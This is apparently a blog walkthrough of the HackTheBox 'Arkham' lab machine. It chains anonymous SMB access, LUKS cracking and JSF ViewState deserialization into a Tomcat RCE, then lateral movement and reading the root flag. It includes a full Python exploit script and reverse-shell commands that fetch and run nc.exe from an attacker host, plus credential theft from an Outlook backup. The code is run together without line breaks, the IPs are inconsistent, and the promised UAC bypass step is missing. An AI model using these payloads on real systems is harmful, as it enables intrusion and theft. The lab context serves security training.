Hack The Box

HackTheBox “Arkham” Walkthrough

Some machines teach you a single technique. Others force you to connect the dots across multiple domains networking, cryptography, web exploitation, and Windows internals. Arkham is one of those boxes.

HackTheBox “Arkham” Walkthrough, figure 1

Some machines teach you a single technique. Others force you to connect the dots across multiple domains networking, cryptography, web exploitation, and Windows internals. Arkham is one of those boxes.

Starting from nothing more than an anonymous SMB share, we will crack a LUKS-encrypted backup, forge a malicious JSF ViewState to gain remote code execution, pivot from Alfred to Batman, and finally bypass UAC using an SMB UNC path trick. It is a beautifully themed Batman-inspired box, and every breadcrumb matters.

If you are preparing for the OSCP, OSWE, or just want to understand how small misconfigurations cascade into full compromise, this walkthrough is for you.

Machine Overview

Name: Arkham
OS: Windows Server 2019
Difficulty: Medium
IP: 10.129.228.116

Attack Chain at a Glance:

Anonymous SMB -> LUKS-encrypted disk image -> crack password (batmanforever) -> extract JSF HMAC/encryption key (JsF9876-) -> forge malicious ViewState -> Java deserialization RCE -> shell as Alfred -> backup.zip -> OST email -> Batman’s password -> WinRM lateral move -> mount C$ over SMB -> read root.txt

The Mindset Before the Shell

Before firing off tools, it is worth reminding yourself of a few principles that make the difference between a fast root and hours of spinning:

1. Follow the data, not the script. Every step should answer a question. Each finding is a breadcrumb, not a destination.
2. Theme awareness matters. BatShare, Alfred, Bruce, batmanforever — these hints are deliberate. Theme-based wordlists and educated guesses save time.
3. Understand the exploit. This box teaches LUKS, JSF serialization, HMAC signing, and Windows UAC. Knowing why something works lets you adapt when it breaks.
4. Privilege is layered. Anonymous -> low user -> mid user -> admin. Focus on the current link in the chain.

Phase 1: Reconnaissance — Mapping the Surface

Every engagement starts with the same question: what can I reach?

nmap -sC -sV -p- 10.129.228.116

This gives us a fast, complete picture of open services:

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS 10.0
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http Apache Tomcat 8.5.37
49666/tcp open msrpc
49667/tcp open msrpc

What stands out?

- Port 80 is Default IIS. Probably not the initial vector.
- Port 8080 is Apache Tomcat 8.5.37. Java app servers love deserialization issues.
- Ports 139/445 are SMB. Anonymous access is a common quick win.
- RPC ports confirm it is Windows; less immediately useful.

Decision: check SMB first, then dig into Tomcat.

HackTheBox “Arkham” Walkthrough, figure 2

Phase 2: SMB Enumeration — The Door Swings Open

SMB null sessions are still one of the most reliable low-hanging fruits in CTFs and real environments.

smbclient -N -L //10.129.228.116

Output:

Sharename Type Comment
 — — — — — — — — — — -
ADMIN$ Disk Remote Admin
BatShare Disk Master Wayne’s secrets
C$ Disk Default share
IPC$ IPC Remote IPC
Users Disk

A custom share named BatShare with the comment “Master Wayne’s secrets”? That is where we go next.

smbclient -N //10.129.228.116/BatShare

Inside, we find a single archive:

smb: \> ls
 appserver.zip A 4046695

smb: \> get appserver.zip

Extracting it reveals two files: IMPORTANT.txt (a note from Bruce to Alfred about a Linux backup) and backup.img.

file backup.img
# backup.img: LUKS encrypted file, ver 1 [aes, xts-plain64, sha256]

HackTheBox “Arkham” Walkthrough, figure 3

Phase 3: Cracking the LUKS Image

LUKS is designed to be slow. Brute-forcing the entire rockyou.txt list at roughly 16 attempts per second would take days. We need a smarter approach.

This is where theme awareness pays off. The share is BatShare. The note mentions Bruce and Alfred. The comment says “Master Wayne.” A Batman-themed wordlist is the obvious move.

grep -i batman /usr/share/wordlists/rockyou.txt > batman.txt
wc -l batman.txt
# ~900 passwords

Then crack with bruteforce-luks:

bruteforce-luks -t 4 -f batman.txt -v 10 backup.img

Password found: batmanforever

With the passphrase, we open the image:

sudo cryptsetup luksOpen backup.img arkham_backup
sudo mount /dev/mapper/arkham_backup /mnt
ls /mnt/Mask/

Inside we find the real treasure: tomcat-stuff/, including a web.xml.bak file.

HackTheBox “Arkham” Walkthrough, figure 4

cat /mnt/Mask/tomcat-stuff/web.xml.bak

Key contents:

<param-name>org.apache.myfaces.SECRET</param-name>
<param-value>SnNGOTg3Ni0=</param-value>

<param-name>org.apache.myfaces.MAC_ALGORITHM</param-name>
<param-value>HmacSHA1</param-value>

<param-name>org.apache.myfaces.MAC_SECRET</param-name>
<param-value>SnNGOTg3Ni0=</param-value>

HackTheBox “Arkham” Walkthrough, figure 5

Decode the secret:

echo “SnNGOTg3Ni0=” | base64 -d
# JsF9876-

This is the server’s JSF ViewState signing and encryption key. With it, we can forge arbitrary ViewStates.

HackTheBox “Arkham” Walkthrough, figure 6

Phase 4: JSF ViewState Deserialization RCE

What is JSF ViewState?

JavaServer Faces (JSF) stores page state in a serialized base64 blob called the ViewState. When the user submits a form, the server deserializes that blob to reconstruct the page.

Java deserialization of untrusted data is a well-known path to Remote Code Execution. Normally, the ViewState is protected by encryption and HMAC signing — so clients cannot tamper with it. But we just extracted the key.

The ViewState Crypto Structure

base64( DES_ECB_encrypt(payload) + HMAC_SHA1(encrypted_payload) )

- Encryption: DES-ECB with key JsF9876-
- MAC: HmacSHA1 with key JsF9876-
- MAC appended as the last 20 bytes

Building the Exploit

We use ysoserial to generate a malicious serialized Java object. The gadget chain CommonsCollections5 works with Apache Commons Collections 3.x, which Tomcat 8.5.37 ships with.

Environment setup:

wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar \ -O /opt/ysoserial.jarpip install pycryptodome - break-system-packagesysoserial needs Java 8-11. On this ARM64 Kali machine, use Java 11 explicitly:/usr/lib/jvm/java-11-openjdk-arm64/bin/java -version

Here is the exploit script that forges and submits the malicious ViewState:

#!/usr/bin/env python3import requestsimport subprocessimport sysfrom base64 import b64encodefrom Crypto.Cipher import DESfrom Crypto.Hash import SHA, HMACfrom os import devnullJAVA = '/usr/lib/jvm/java-11-openjdk-arm64/bin/java'YSOSERIAL = '/opt/ysoserial.jar'TARGET = 'http://10.129.228.116:8080/userSubscribe.faces'KEY = b'JsF9876-'cmd = sys.argv[1]with open(devnull, 'w') as null: payload = subprocess.check_output( [JAVA, '-jar', YSOSERIAL, 'CommonsCollections5', cmd], stderr=null )pad = (8 - (len(payload) % 8)) % 8padded = payload + (chr(pad) * pad).encode()d = DES.new(KEY, DES.MODE_ECB)enc_payload = d.encrypt(padded)sig = HMAC.new(KEY, enc_payload, SHA).digest()viewstate = b64encode(enc_payload + sig)sess = requests.session()sess.get(TARGET)sess.post(TARGET, data={ 'j_id_jsp_1623871077_1%3Aemail': 'd', 'j_id_jsp_1623871077_1%3Asubmit': 'SIGN+UP', 'j_id_jsp_1623871077_1_SUBMIT': '1', 'javax.faces.ViewState': viewstate})print("[+] Payload sent")

Pro Tip: Ping Before Shell

Before throwing a reverse shell, verify execution with something observable:

Terminal 1:
sudo tcpdump -i tun0 icmp

Terminal 2:
python3 exploit.py “ping -n 2 10.10.16.84”

A successful ping confirms the deserialization chain works, outbound traffic reaches you, and the only remaining variable is the shell itself.

HackTheBox “Arkham” Walkthrough, figure 7
HackTheBox “Arkham” Walkthrough, figure 8

Phase 5: Shell as Alfred and the User Flag

With RCE confirmed, we drop a Windows netcat binary. Because AppLocker is enabled, we use a known safe path: C:\Windows\System32\spool\drivers\color\.

Serve the binary:
python3 -m http.server 80

HackTheBox “Arkham” Walkthrough, figure 9

Upload it:
python3 exploit.py “powershell -c Invoke-WebRequest -Uri http://10.10.14.6/nc.exe -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe”

HackTheBox “Arkham” Walkthrough, figure 10

Start a listener:
rlwrap nc -lnvp 4444

Trigger the shell:
python3 exploit.py “C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.6 4444”

HackTheBox “Arkham” Walkthrough, figure 11

We catch the shell:

connect to [10.10.14.6] from (UNKNOWN) [10.129.228.116] 49685
Microsoft Windows [Version 10.0.17763.107]

C:\tomcat\apache-tomcat-8.5.37\bin> whoami
arkham\alfred

HackTheBox “Arkham” Walkthrough, figure 12

User flag:

C:\> type C:\Users\Alfred\Desktop\user.txt

HackTheBox “Arkham” Walkthrough, figure 13

Phase 6: Lateral Movement to Batman

Landing as Alfred is only halfway there. The next step is classic post-exploitation enumeration.

C:\> net users
Administrator Alfred Batman DefaultAccount Guest WDAGUtilityAccount

C:\> net user batman
Local Group Memberships: *Administrators *Remote Management Use *Users

Batman is in the Administrators group and Remote Management Users. If we can get his password, we can WinRM in as a local admin.

HackTheBox “Arkham” Walkthrough, figure 14

Digging through Alfred’s home directory:

C:\> dir /s /b /a:-d-h \Users\alfred | findstr /i /v “appdata”
C:\Users\Alfred\Desktop\user.txt
C:\Users\Alfred\Documents\tomcat.bat
C:\Users\Alfred\Downloads\backups\backup.zip

HackTheBox “Arkham” Walkthrough, figure 15

We transfer backup.zip to kali using an authenticated SMB server (guest SMB is disabled on Server 2019):

Kali:
impacket-smbserver -smb2support -username kali -password kali share htb/

HackTheBox “Arkham” Walkthrough, figure 16

Target shell:
net use \\10.10.16.84\share /u:kali kali
copy C:\Users\Alfred\Downloads\backups\backup.zip \\10.10.16.84\share\
net use \\10.10.16.84\share /delete

HackTheBox “Arkham” Walkthrough, figure 17

Extracting the zip gives us alfred@arkham.local.ost — an Outlook offline mailbox cache.

unzip backup.zip
file alfred@arkham.local.ost
# Microsoft Outlook email folder (>=2003)

readpst -S alfred@arkham.local.ost

HackTheBox “Arkham” Walkthrough, figure 18

Listing /Drafts/

HackTheBox “Arkham” Walkthrough, figure 19

Opening Drafts/1-image001.png reveals Batman’s password in what looks like a sticky note or password manager screenshot:

Batman’s password: Zx^#QZX+T!123

HackTheBox “Arkham” Walkthrough, figure 20

The email subject? “Master Wayne stop forgetting your password.” Classic credential mismanagement.

Now we WinRM in as Batman. Start a new listener on port 4445, then from the Alfred shell:

powershell
Invoke-Command -ComputerName ARKHAM -Credential $credential -ScriptBlock {
 & “C:\Windows\System32\spool\drivers\color\nc.exe” -e cmd.exe 10.10.16.84 4445
}

HackTheBox “Arkham” Walkthrough, figure 21

We catch a second shell:

connect to [10.10.14.6] from (UNKNOWN) [10.129.228.116] 49690

Phase 7: Root Flag via SMB UNC UAC Bypass

Batman is an administrator, but that does not mean his shell is elevated. Windows UAC filters admin tokens by default.

C:\> type C:\Users\Administrator\Desktop\root.txt

HackTheBox “Arkham” Walkthrough, figure 22

Key Takeaways

1. Anonymous SMB access is still a critical foothold. One misconfigured share handed us a full server backup.
2. Backups are dangerous. The LUKS image contained Tomcat’s secret key because backups are rarely protected like production systems.
3. Java deserialization is powerful but protocol-sensitive. ysoserial gave us the payload, but understanding the DES + HMAC wrapper was essential to delivering it.
4. Credentials live everywhere. Alfred’s Outlook backup, stored in a zip in Downloads, contained Batman’s password.
5. UAC is not a security boundary. A simple UNC path bypassed it entirely.

Commands Cheatsheet

SMB enumeration:
smbclient -N -L //10.129.228.116
smbclient -N //10.129.228.116/BatShare

LUKS cracking:
grep -i batman /usr/share/wordlists/rockyou.txt > batman.txt
bruteforce-luks -t 4 -f batman.txt -v 10 backup.img
sudo cryptsetup luksOpen backup.img arkham_backup # pw: batmanforever
sudo mount /dev/mapper/arkham_backup /mnt

Extract JSF key:
grep -A1 “SECRET\|MAC_SECRET” /mnt/Mask/tomcat-stuff/web.xml.bak
echo “SnNGOTg3Ni0=” | base64 -d # => JsF9876-

RCE verification:
sudo tcpdump -i tun0 icmp
python3 exploit.py “ping -n 2 <KALI_IP>”

Shell delivery:
python3 -m http.server 80
rlwrap nc -lnvp 443
python3 exploit.py “powershell -c Invoke-WebRequest -Uri http://<KALI_IP>/nc.exe -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe”
python3 exploit.py “C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe -e cmd.exe <KALI_IP> 443”

Lateral move:
impacket-smbserver -smb2support -username kali -password kali share .
readpst -S alfred@arkham.local.ost

Root:
net use Z: \\ARKHAM\C$
type Z:\Users\Administrator\Desktop\root.txt

Final Thoughts

Arkham is a fantastic example of how a single oversight an anonymous SMB share with a backup inside can unravel an entire machine. It rewards patience, theme awareness, and the ability to move between Linux and Windows tooling seamlessly.

If you enjoyed this walkthrough, follow me for more HTB write-ups, OSCP prep notes, and real-world red team stories.

Thanks for reading. Happy hacking.